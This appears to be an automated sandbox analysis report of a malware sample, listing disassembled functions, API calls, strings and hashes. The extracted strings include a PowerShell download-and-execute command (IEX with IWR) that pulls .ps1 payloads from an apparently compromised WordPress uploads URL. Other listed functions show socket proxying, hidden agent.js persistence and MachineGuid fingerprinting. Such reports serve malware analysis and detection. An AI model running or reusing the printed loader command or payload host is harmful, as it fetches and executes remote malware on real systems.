task.LIBCPMTD ref: 00FB22B4

Strings

P, xrefs: 00FB2326
-, xrefs: 00FB23C5
lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa, xrefs: 00FB21E5
[, xrefs: 00FB2301
oyr, xrefs: 00FB21F6
ianh, xrefs: 00FB21D1, 00FB234E, 00FB2374

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
API String ID: 2802545854-2318821752
Opcode ID: 26e070bf21d521db06a0a0c3a58cfdcb746a381ee6c385c9830e20b70ce2eb5c
Instruction ID: 4e056cfc3fe9184dcf42e47b6dc19e42f045a71391f50e9831e380093c844626
Opcode Fuzzy Hash: 26e070bf21d521db06a0a0c3a58cfdcb746a381ee6c385c9830e20b70ce2eb5c
Instruction Fuzzy Hash: 5E714A70D04258CEDB64EFA5CD56BEDBBB0AF04704F14819DD049A7282DB785B88EF51

Uniqueness

Uniqueness Score: -1.00%

Function 005A8520 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 69stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005A8541
ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005A8554
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005A8567
GetFileAttributesW.KERNEL32(?), ref: 005A858D
GetFileAttributesW.KERNEL32(?), ref: 005A85A6
lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005A85BD
wnsprintfW.SHLWAPI ref: 005A85E0
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005A8602

Strings

%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 005A853C
open, xrefs: 005A85FB
sd4.ps1, xrefs: 005A85B1
https://xpradiotwo.com/wp-content/uploads, xrefs: 005A85CA
%ComSpec%, xrefs: 005A8562
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 005A854F
/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 005A85CF
sd2.ps1, xrefs: 005A8598

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://xpradiotwo.com/wp-content/uploads$open$sd2.ps1$sd4.ps1
API String ID: 4132772799-2303719311
Opcode ID: f882ce59608c18cb06792e674cb1e3976ab75f3ffef4a9676358cd8c0bfd10bd
Instruction ID: 11015f55b30dec0c5522288284306791d8d3d9a8b9e74ec62365a989a77d8a67
Opcode Fuzzy Hash: f882ce59608c18cb06792e674cb1e3976ab75f3ffef4a9676358cd8c0bfd10bd
Instruction Fuzzy Hash: EA219671D4062C6AEB10D7A4CC45FFE7FACBB1A714F040591AA58E20D1DBB05A898FD1

Uniqueness

Uniqueness Score: -1.00%

Function 005A56D0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167memorypipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 005A5703
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5761
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5774
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5779
WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5790
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A57A7
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A57E4
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A580F
HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5812
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A581D
HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5820
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5877
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5893
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5898

Strings

D, xrefs: 005A5726

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
String ID: D
API String ID: 2337985897-2746444292
Opcode ID: adae26e5ee95b7e3b226b8a2f4b28cf2ace2535028b538dff95281fe26f4bf6f
Instruction ID: 0dccf0c17a489151dedc127051fc0d81582416a24bca1dae9aa1cd686773ec2d
Opcode Fuzzy Hash: adae26e5ee95b7e3b226b8a2f4b28cf2ace2535028b538dff95281fe26f4bf6f
Instruction Fuzzy Hash: C051B371A00219AFEB208FA5DC48FAF7FB9FF45744F244469E915F7291EB7498048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A62A0 Relevance: 24.1, APIs: 16, Instructions: 136networkmemoryCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 005A62C0
htons.WS2_32(?), ref: 005A62DC
inet_pton.WS2_32(00000002,?,?), ref: 005A62EE
htons.WS2_32(?), ref: 005A62F5
socket.WS2_32(00000002,00000001,00000006), ref: 005A6308
connect.WS2_32(00000000,?,00000010), ref: 005A6323
socket.WS2_32(00000002,00000001,00000006), ref: 005A6334
connect.WS2_32(00000000,?,00000010), ref: 005A6349
select.WS2_32(00000000,?), ref: 005A6371
recv.WS2_32(?,?,00000400,00000000), ref: 005A63A4
send.WS2_32(00000000,?,00000000,00000000), ref: 005A63CA
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 005A63FC
closesocket.WS2_32(00000000), ref: 005A6412
closesocket.WS2_32(00000000), ref: 005A6419
GetProcessHeap.KERNEL32(00000000,?), ref: 005A6424
HeapFree.KERNEL32(00000000), ref: 005A642B

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heapclosesocketconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
String ID:
API String ID: 1922096520-0
Opcode ID: 231102c69fd58942bba2cdb53f3977499aaa63760eb6f8aa0886e99098fce032
Instruction ID: b5cb10f600d96072948abd713a44e627fe1d0b9652b8c85a0e66b4f1d44b6fe8
Opcode Fuzzy Hash: 231102c69fd58942bba2cdb53f3977499aaa63760eb6f8aa0886e99098fce032
Instruction Fuzzy Hash: 44418D71104304ABE7109F649C89B6EBBE8FF9A710F14091EF655D71E1D3B0E8498BA2

Uniqueness

Uniqueness Score: -1.00%

Function 005A7290 Relevance: 22.6, APIs: 15, Instructions: 131memorynetworkthreadCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 005A72A3
htons.WS2_32(?), ref: 005A72AE
socket.WS2_32(00000002,00000001,00000006), ref: 005A72C6
connect.WS2_32(00000000,?,00000010), ref: 005A72E4
recv.WS2_32(00000000,?,00000002,00000000), ref: 005A72FC
GetProcessHeap.KERNEL32(00000008,00000024), ref: 005A731D
HeapAlloc.KERNEL32(00000000), ref: 005A7320
CreateThread.KERNEL32(00000000,00000000,Function_000062A0,00000000,00000000,00000000), ref: 005A739B
CloseHandle.KERNEL32(00000000), ref: 005A73A6
recv.WS2_32(00000000,?,00000002,00000000), ref: 005A73BE
closesocket.WS2_32(00000000), ref: 005A73CD
GetProcessHeap.KERNEL32(00000000,?), ref: 005A73D6
HeapFree.KERNEL32(00000000), ref: 005A73D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A73F3
HeapFree.KERNEL32(00000000), ref: 005A73F6

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2784442062-0
Opcode ID: 5a7cc7d9c1116afc99ba1faf57d5e701ea825e8511c32a884bacc1a8773e00e9
Instruction ID: 15d38eaa2f93ebcfd0c5d16110f886c14ff5a2fa9593291289682697fb4cbce7
Opcode Fuzzy Hash: 5a7cc7d9c1116afc99ba1faf57d5e701ea825e8511c32a884bacc1a8773e00e9
Instruction Fuzzy Hash: 7241E474A0534AABEB204B759C49B6F7F78BF1B701F14485AFE02DA182D3709845E7E4

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1E90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

task.LIBCPMTD ref: 00FB1F50
task.LIBCPMTD ref: 00FB1F5F
task.LIBCPMTD ref: 00FB1F8F
task.LIBCPMTD ref: 00FB1F9B
task.LIBCPMTD ref: 00FB1FA7
task.LIBCPMTD ref: 00FB1FB3
task.LIBCPMTD ref: 00FB1FBF
task.LIBCPMTD ref: 00FB1FCE

Strings

gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 00FB1EDD
fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 00FB1EF6
hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 00FB1EC5, 00FB1F07, 00FB1F24
`, xrefs: 00FB1F6C

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traits
String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
API String ID: 1455298312-2158094500
Opcode ID: fa04a69e73dd004fa707f5cf57d765a3b9aa9789da73ecebecc0671c2b75c3ff
Instruction ID: 4ae3430607fdf17edbbc8bdc5c0f0edba41006d76a0ca7ab37636daef99852ee
Opcode Fuzzy Hash: fa04a69e73dd004fa707f5cf57d765a3b9aa9789da73ecebecc0671c2b75c3ff
Instruction Fuzzy Hash: 03412A3094438CDADB04EFA5CD66BEDBBB4AF11708F50419DE0056B282DB795B48EF51

Uniqueness

Uniqueness Score: -1.00%

Function 005A7160 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 005A7181
lstrlenW.KERNEL32(?), ref: 005A718A
ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 005A71A5
GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 005A71B3
GetLastError.KERNEL32 ref: 005A71BD
ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 005A71D4
wnsprintfW.SHLWAPI ref: 005A71EE
SetFileAttributesW.KERNEL32(?,00000006), ref: 005A720E

Strings

%ProgramW6432%, xrefs: 005A717C
%ProgramFiles%, xrefs: 005A71A0
"%s", xrefs: 005A71DD
%ProgramData%\agent.js, xrefs: 005A71CF

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: EnvironmentExpandStrings$AttributesDirectoryErrorFileLastSystemWow64lstrlenwnsprintf
String ID: "%s"$%ProgramData%\agent.js$%ProgramFiles%$%ProgramW6432%
API String ID: 457462216-4115850629
Opcode ID: 2a2108295a634b8b56a274028851ea824fb6a5b41d640c17b24dd3d25d2f3888
Instruction ID: 00ece9c7b2f0f734ff5fafe9c2277ee1479c9bc1372e3f36f00e18959adb9d65
Opcode Fuzzy Hash: 2a2108295a634b8b56a274028851ea824fb6a5b41d640c17b24dd3d25d2f3888
Instruction Fuzzy Hash: 3411D6B5E4031C6BE710D790AC49EDE7BACAB59744F4400A1A755D2091EBB05A88CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 00FBA0C4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00FBA108

Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C4C
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C5E
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C70
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C82
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C94
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CA6
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CB8
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CCA
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CDC
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CEE
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9D00
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9D12
Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9D24

_free.LIBCMT ref: 00FBA0FD

Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA

_free.LIBCMT ref: 00FBA11F
_free.LIBCMT ref: 00FBA134
_free.LIBCMT ref: 00FBA13F
_free.LIBCMT ref: 00FBA161
_free.LIBCMT ref: 00FBA174
_free.LIBCMT ref: 00FBA182
_free.LIBCMT ref: 00FBA18D
_free.LIBCMT ref: 00FBA1C5
_free.LIBCMT ref: 00FBA1CC
_free.LIBCMT ref: 00FBA1E9
_free.LIBCMT ref: 00FBA201

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6a476b369ebdab3703afabdd3a9e2a7d4550d153fb5292f3ab259cfff5e13fb4
Instruction ID: 201115be74c974dcc4d548b9c501de3755a08fa68b2c3e95b4bf6223bb5c73f0
Opcode Fuzzy Hash: 6a476b369ebdab3703afabdd3a9e2a7d4550d153fb5292f3ab259cfff5e13fb4
Instruction Fuzzy Hash: 1F315A31A083019FEB71AA3EDC45BEAB3E9AF40320F108419E498D7251DE34AD85AF65

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2540 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

operator!=.LIBCPMTD ref: 00FB2606
task.LIBCPMTD ref: 00FB2614
task.LIBCPMTD ref: 00FB2623

Strings

0, xrefs: 00FB2630
W, xrefs: 00FB269A
nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng, xrefs: 00FB2582, 00FB25D1, 00FB25EE
, xrefs: 00FB267A
(, xrefs: 00FB25B5
8, xrefs: 00FB2655

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
API String ID: 2802545854-1628632686
Opcode ID: bcda77af7c82093739e87f303b687990e94e50a8e6f6ce53580e4512b9643980
Instruction ID: 9a3db20c15d7c639ca84b2c4d1fcaebcfaea9f11aed0f596a1683677fa7dcd5e
Opcode Fuzzy Hash: bcda77af7c82093739e87f303b687990e94e50a8e6f6ce53580e4512b9643980
Instruction Fuzzy Hash: 43517A71D0420CDBDB54DFA9D955BEDBBB2FF04308F104219E401AB281EB799A84EF41

Uniqueness

Uniqueness Score: -1.00%

Function 005A6980 Relevance: 15.1, APIs: 12, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(005AA080), ref: 005A6991
StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005A69CA
LeaveCriticalSection.KERNEL32(005AA080,00000000), ref: 005A69E6
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A40
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A47
LeaveCriticalSection.KERNEL32(005AA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A5D
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A77
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A7E
LeaveCriticalSection.KERNEL32(005AA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A8F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 005A6A9B
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6AA2
LeaveCriticalSection.KERNEL32(005AA080), ref: 005A6AB3

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
String ID:
API String ID: 2132424838-0
Opcode ID: 7aee7a451d9a0d89390eeaafaae79e661f8cb0cf9315708838961d593edf18ca
Instruction ID: 5c405c7e7458fc36be7f45a99a24bf812daea8de55b0399f0835563941db0b18
Opcode Fuzzy Hash: 7aee7a451d9a0d89390eeaafaae79e661f8cb0cf9315708838961d593edf18ca
Instruction Fuzzy Hash: F531BFB16002019FEB245FA4EC5CB6F3F65FBAB712F188029F556D62A2DB308448E791

Uniqueness

Uniqueness Score: -1.00%

Function 00FB8212 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FB8228

Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA

_free.LIBCMT ref: 00FB8234
_free.LIBCMT ref: 00FB823F
_free.LIBCMT ref: 00FB824A
_free.LIBCMT ref: 00FB8255
_free.LIBCMT ref: 00FB8260
_free.LIBCMT ref: 00FB826B
_free.LIBCMT ref: 00FB8276
_free.LIBCMT ref: 00FB8281
_free.LIBCMT ref: 00FB828F

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 41dad01a9b08e31bb04cdfa0fa62b443ae7f2d1029a640d25a2802fe9419326d
Instruction ID: fcc64c3a836f5782e5ca4434b15683399b1a8ba38df47ff88f65d9cd58d44762
Opcode Fuzzy Hash: 41dad01a9b08e31bb04cdfa0fa62b443ae7f2d1029a640d25a2802fe9419326d
Instruction Fuzzy Hash: E021987A904208AFCB41EF95CC81DDE7BB9BF48340B0041A5B5159B221DB35DB95DFD4

Uniqueness

Uniqueness Score: -1.00%

Function 005A7000 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 130registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005A7037
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005A7053
GetProcessHeap.KERNEL32(00000008,?), ref: 005A7062
HeapAlloc.KERNEL32(00000000), ref: 005A7069
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005A7086
RegCloseKey.ADVAPI32(80000002), ref: 005A7098

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 005A702D
MachineGuid, xrefs: 005A704B, 005A707E

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: HeapQueryValue$AllocCloseOpenProcess
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2639912721-1211650757
Opcode ID: 14d12be6f68eea1c418a6684ca08b5882395a8f78c2df0a451fb692f99bfb584
Instruction ID: dc28e46728d79a3457aa0257fbc253addece3a23f2c2e4d456bc4c53f7706867
Opcode Fuzzy Hash: 14d12be6f68eea1c418a6684ca08b5882395a8f78c2df0a451fb692f99bfb584
Instruction Fuzzy Hash: FA41BE31E04619ABDB318BA9CC88ABFBFF8BF5E700F104468D941A7251E7709D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1D30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

operator!=.LIBCPMTD ref: 00FB1DB9
task.LIBCPMTD ref: 00FB1DC7
task.LIBCPMTD ref: 00FB1DD6

Strings

jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug, xrefs: 00FB1D5B, 00FB1D84, 00FB1DA1
P, xrefs: 00FB1D76
H, xrefs: 00FB1E28
1, xrefs: 00FB1E08

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
API String ID: 2802545854-3608006743
Opcode ID: 8020949b8d6cbe30e2805a1e0079c2aa8b516e498a075f98ee3e575e36dc0283
Instruction ID: b28be905bef574a5a99d2fcb6101c00cbbeb9a7615097fd2ada261a0e2b4c636
Opcode Fuzzy Hash: 8020949b8d6cbe30e2805a1e0079c2aa8b516e498a075f98ee3e575e36dc0283
Instruction Fuzzy Hash: 83412871D00248DBDB14DFA5D9A5BEDBBB0FF04714F60411DE802A7281DB78AA45EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FB28A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94COMMON

Download Yara Rule

Strings

jgjqrkqomrozhbdhmdxtwulfach, xrefs: 00FB28D9
&, xrefs: 00FB2973
uqip, xrefs: 00FB2902
9, xrefs: 00FB2913
